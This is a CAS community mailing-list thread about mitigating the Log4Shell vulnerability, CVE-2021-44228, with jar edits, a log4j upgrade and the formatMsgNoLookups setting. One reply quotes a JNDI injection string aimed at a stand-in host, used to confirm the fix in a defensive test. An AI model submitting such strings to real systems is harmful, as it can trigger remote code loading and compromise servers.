log4j vulnerability

[King, Robert]

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228

 

Has anyone attempted to mitigate this CVE yet?

 

There seems to be two possible approaches to mitigation:

 

1 The sledgehammer approach of removing the JndiLookup.class from the jar files:

 

zip –q –d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

 

2. Rebuild CAS and set “log4jVersion=2.15.0”

[Richard Frovarp]

Using a new enough version of the JDK might also alleviate it? The other option is to throw the config option at the JDK to stop it from happening. That would seem to be easiest.

--
- Website: https://apereo.github.io/cas
- Gitter Chatroom: https://gitter.im/apereo/cas
- List Guidelines: https://goo.gl/1VRrw7
- Contributions: https://goo.gl/mh7qDG
---
You received this message because you are subscribed to the Google Groups "CAS Community" group.
To unsubscribe from this group and stop receiving emails from it, send an email to cas-user+u...@apereo.org.
To view this discussion on the web visit https://groups.google.com/a/apereo.org/d/msgid/cas-user/885973b3982643508efbf27a99855460%40mun.ca.

[Mike Osterman]

Yeah, it seems like setting the log4j2.formatMsgNoLookups to "true" in the log4j2.xml config file might do to trick.

I'm guessing we'd do that somewhere here at the top?

<?xml version="1.0" encoding="UTF-8" ?>
<!-- Specify the refresh internal in seconds. -->
<Configuration monitorInterval="5" packages="org.apereo.cas.logging">
    <Properties>
        <Property name="baseDir">/etc/cas/logs</Property>
    </Properties>
    <Appenders>

To view this discussion on the web visit https://groups.google.com/a/apereo.org/d/msgid/cas-user/afcce42d-1ecd-1bd8-6598-ecba78b6e987%40ndsu.edu.

[Richard Frovarp]

Maybe? The one that I've seen

https://logging.apache.org/log4j/2.x/security.html

says set it as a system property, so -Dlog4j2.formatMsgNoLookups=true to your JVM and not in the config file.

To view this discussion on the web visit https://groups.google.com/a/apereo.org/d/msgid/cas-user/CAEdMQHUe7%2BfgzA2uQ2eWFe9O-a%3D9sOP4LBi9FviTvsEMYHtKsA%40mail.gmail.com.

[Adam Franco]

I've rebuilt CAS with log4j 2.15.0 and confirmed that doing so stopped outgoing connections when a line like
${jndi:rmi://www.example.com:80/test}
was submitted in the username field (I used a real hostname rather than www.example.com).

We were able to verify this fix with tcpdump on the CAS node as well as border-firewall logging.

[King, Robert]

Just rolled out this mitigation to our servers, seems to be effective for CAS 6.3.x builds.

 

Our environment for reference:

 

- Standalone Tomcat

- OpenJDK

- CAS and CAS-Management as deployed jars

- CAS and CAS-Mangement built from cas-overlay and cas-management-overlay repos.

 

Mitigated by adding “-Dlog4j2.FormatMsgNoLookups=true” into the Tomcat startup in systemd tomcat.service file.

To view this discussion on the web visit https://groups.google.com/a/apereo.org/d/msgid/cas-user/67916862-8f31-e08c-1949-86a97958ba36%40ndsu.edu.

[Anders Collstrup]

My fix was the following:

CAS 6.1 running on debian 10. All except CAS installed from standard repo's

created this file:
/usr/share/tomcat9/bin/setenv.sh

containing::
JAVA_OPTS="-Dlog4j2.formatMsgNoLookups=True"

After restart of tomcat I could see the following in the log:
10-Dec-2021 18:49:18.681 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log Command line argument: -Dlog4j2.formatMsgNoLookups=True

To view this discussion on the web visit https://groups.google.com/a/apereo.org/d/msgid/cas-user/b01416e5aefd4cb6aba835240836244d%40mun.ca.